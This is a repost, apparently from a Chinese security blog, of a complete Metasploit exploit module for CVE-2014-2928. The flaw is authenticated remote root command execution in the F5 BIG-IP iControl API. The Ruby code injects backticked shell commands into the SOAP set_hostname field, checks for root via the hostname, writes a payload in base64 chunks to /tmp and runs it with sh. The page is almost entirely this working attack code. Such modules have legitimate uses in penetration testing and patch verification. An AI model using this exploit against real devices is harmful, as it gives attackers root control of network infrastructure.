关注我们
QRcode 邮件联系 QRcode

F5 iControl Remote Root Command Execution Exploit

 feng  651 ℃  0条点评
Full title F5 iControl Remote Root Command Execution Exploit
Date add 2014-10-09
Category remote exploits
Platform multiple
Risk
CVE CVE-2014-2928

Description:
This Metasploit module exploits an authenticated remote command execution vulnerability in the F5 BIGIP iControl API (and likely other F5 devices).

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: <a href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a>
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => "F5 iControl Remote Root Command Execution",
      'Description'    => %q{
        This module exploits an authenticated remote command execution
        vulnerability in the F5 BIGIP iControl API (and likely other
        F5 devices).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bperry' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-2928'],
          ['URL', '<a href="http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html">http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html</a>']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['F5 iControl', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Sep 17 2013",
      'DefaultTarget'  => 0))
      register_options(
        [
          Opt::RPORT(443),
          OptBool.new('SSL', [true, 'Use SSL', true]),
          OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
          OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
        ], self.class)
  end
  def check
    get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="<a href="http://schemas.xmlsoap.org/soap/envelope/">http://schemas.xmlsoap.org/soap/envelope/</a>">
    <SOAP-ENV:Body>
    <n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    }
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => get_hostname,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })
    res.body =~ /y:string">(.*)<\/return/
    hostname = $1
    send_cmd("whoami")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => get_hostname,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })
    res.body =~ /y:string">(.*)<\/return/
    new_hostname = $1
    if new_hostname == "root.a.b"
      pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
        <SOAP-ENV:Envelope xmlns:SOAP-ENV="<a href="http://schemas.xmlsoap.org/soap/envelope/">http://schemas.xmlsoap.org/soap/envelope/</a>">
        <SOAP-ENV:Body>
        <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
        <hostname>#{hostname}</hostname>
        </n1:set_hostname>
        </SOAP-ENV:Body>
        </SOAP-ENV:Envelope>
      }
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
        'method' => 'POST',
        'data' => pay,
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      })
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end
  def send_cmd(cmd)
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="<a href="http://schemas.xmlsoap.org/soap/envelope/">http://schemas.xmlsoap.org/soap/envelope/</a>">
      <SOAP-ENV:Body>
      <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
        <hostname>`#{cmd}`.a.b</hostname>
        </n1:set_hostname>
        </SOAP-ENV:Body>
        </SOAP-ENV:Envelope>
    }
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => pay,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })
  end
  def exploit
    filename = Rex::Text.rand_text_alpha_lower(5)
    print_status('Sending payload in chunks, might take a small bit...')
    i = 0
    while i < payload.encoded.length
      cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
      send_cmd(cmd)
      i = i + 5
    end
    print_status('Triggering payload...')
    send_cmd("sh /tmp/#{filename}")
  end
end
# 9AEA59A0218A7C89   1337day.com [2014-10-09]   209DF816906A4EA6 #
本文标签:
Wordpress InfusionSoft Upload Exploit
OpenSSH SFTP 远程溢出漏洞
发生在现实生活中家庭路由器入侵的真实案例发生在现实生活中家庭路由器入侵的真实案例WiFi流量劫持—— JS脚本缓存投毒WiFi流量劫持—— JS脚本缓存投毒用perl抓取cookies用perl抓取cookies圣道传奇送钻,游戏30分钟即可获得圣道传奇送钻,游戏30分钟即可获得

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码